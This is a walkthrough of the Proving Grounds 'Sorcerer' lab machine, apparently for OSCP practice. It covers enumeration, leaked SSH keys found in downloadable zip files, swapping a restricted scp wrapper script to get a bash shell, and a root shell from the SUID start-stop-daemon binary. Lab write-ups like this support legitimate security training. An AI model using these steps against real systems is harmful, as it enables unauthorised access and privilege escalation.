Logo
Overview

PG: Sorcerer | Walkthrough

November 24, 2021
3 min read
PG/Machines Boot2Root OSCP/Prep CVE/rConfig writeups PE/SUID

Enumeration

Nmap Scan

Terminal window
$ sudo nmap $ip -p22,80,111,2049,8080,35801,44957,57931,60477,7742 -sVC -Pn --version-all -O


PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 81:2a:42:24:b5:90:a1:ce:9b:ac:e7:4e:1d:6d:b4:c6 (RSA)
|   256 d0:73:2a:05:52:7f:89:09:37:76:e3:56:c8:ab:20:99 (ECDSA)
|_  256 3a:2d:de:33:b0:1e:f2:35:0f:8d:c8:d7:8f:f9:e0:0e (ED25519)
80/tcp    open  http     nginx
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100003  3           2049/udp   nfs
|   100003  3,4         2049/tcp   nfs
|   100005  1,2,3      57252/udp   mountd
|   100005  1,2,3      60477/tcp   mountd
|   100021  1,3,4      35801/tcp   nlockmgr
|   100021  1,3,4      43898/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/udp   nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
7742/tcp open  http    nginx
|_http-title: SORCERER
8080/tcp  open  http     Apache Tomcat 7.0.4
|_http-title: Apache Tomcat/7.0.4
|_http-favicon: Apache Tomcat
35801/tcp open  nlockmgr 1-4 (RPC #100021)
44957/tcp open  mountd   1-3 (RPC #100005)
57931/tcp open  mountd   1-3 (RPC #100005)
60477/tcp open  mountd   1-3 (RPC #100005)

Directory Fuzzing on port 7742

Terminal window
$ gobuster dir -u http://$ip:7742/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q  -x php,html,txt
/default              (Status: 301) [Size: 178] [--> http://192.168.66.100:7742/default/]
/index.html           (Status: 200) [Size: 1219]
/index.html           (Status: 200) [Size: 1219]
/zipfiles             (Status: 301) [Size: 178] [--> http://192.168.66.100:7742/zipfiles/]

Download the zip files present in the directory

Terminal window
$ curl http://$ip:7742/zipfiles/
<html>
<head><title>Index of /zipfiles/</title></head>
<body bgcolor="white">
<h1>Index of /zipfiles/</h1><hr><pre><a href="../">../</a>
<a href="francis.zip">francis.zip</a>                                        24-Sep-2020 19:27                2834
<a href="max.zip">max.zip</a>                                            24-Sep-2020 19:27                8274
<a href="miriam.zip">miriam.zip</a>                                         24-Sep-2020 19:27                2826
<a href="sofia.zip">sofia.zip</a>                                          24-Sep-2020 19:27                2818
</pre><hr></body>
</html>

one of them has ssh keys

Terminal window
$ unzip max.zip
Archive:  max.zip
   creating: home/max/
  inflating: home/max/.bash_logout
  inflating: home/max/.profile
   creating: home/max/.ssh/
  inflating: home/max/.ssh/id_rsa.pub
  inflating: home/max/.ssh/authorized_keys
  inflating: home/max/.ssh/id_rsa
  inflating: home/max/tomcat-users.xml.bak
  inflating: home/max/.bashrc
  inflating: home/max/scp_wrapper.sh

Exploitation

Initial Access

cannot ssh into machine with private key

Terminal window
$ ssh -i id_rsa max@$ip
The authenticity of host '192.168.66.100 (192.168.66.100)' can't be established.
ED25519 key fingerprint is SHA256:VS30806A83YR6y/jbQ1fv89VM1FjmXYbb9zmKkJ5N+4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.66.100' (ED25519) to the list of known hosts.
PTY allocation request failed on channel 0
ACCESS DENIED.
usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]
           [-l limit] [-o ssh_option] [-P port] [-S program] source ... target
Connection to 192.168.66.100 closed.

Only scp is allowed to run. If scp is not used, it echoes access denied and runs scp.

$ cat scp_wrapper.sh


#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
 'scp'*)
    $SSH_ORIGINAL_COMMAND
    ;;
 *)
    echo "ACCESS DENIED."
    scp
    ;;
esac

modify the script which will run bash instead of scp on error.

$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
 'scp'*)
    $SSH_ORIGINAL_COMMAND
    ;;
 *)
    echo "Give me shell"
    bash
    ;;
esac

Replace the script on target machine using scp

Terminal window
$ scp -i .ssh/id_rsa scp_wrapper.sh  max@192.168.66.100:/home/max/scp_wrapper.sh

ssh into machine

Terminal window
$ ssh -i .ssh/id_rsa max@$ip
PTY allocation request failed on channel 0
Give me shell
whoami
max

Privilege Escalation

Misconfigured SUID

Terminal window
max@sorcerer:/tmp$ find / -type f -perm /4000 2>/dev/null
/usr/sbin/mount.nfs
/usr/sbin/start-stop-daemon
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/su
/usr/bin/mount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
max@sorcerer:/tmp$ /usr/sbin/start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
# whoami
root
# cat /root/proof.txt
26d037b0cb0b3552d13588175447b12d